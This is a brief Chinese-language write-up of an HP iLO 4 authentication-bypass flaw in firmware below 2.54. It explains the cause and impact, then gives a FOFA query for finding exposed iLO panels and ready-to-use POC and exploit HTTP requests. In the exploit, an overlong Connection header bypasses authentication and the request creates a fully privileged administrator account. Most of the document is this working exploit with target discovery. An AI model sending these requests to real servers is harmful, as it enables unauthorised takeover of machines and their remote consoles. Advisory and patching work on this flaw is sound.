原理
未授权访问,由于添加用户操作未对操作者的身份进行验证,导致未授权用户添加。
影响范围
iLO 4 固件版本低于2.54 的2.xx版本
危害
获取Web面板完整访问权限,可通过惠普iLO自带的远控软件对主机进行控制。
下载地址为:https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8
POC & EXP
fofa
title="iLO"
手工
# POC
GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
# EXP
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
{"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "administratar"}}}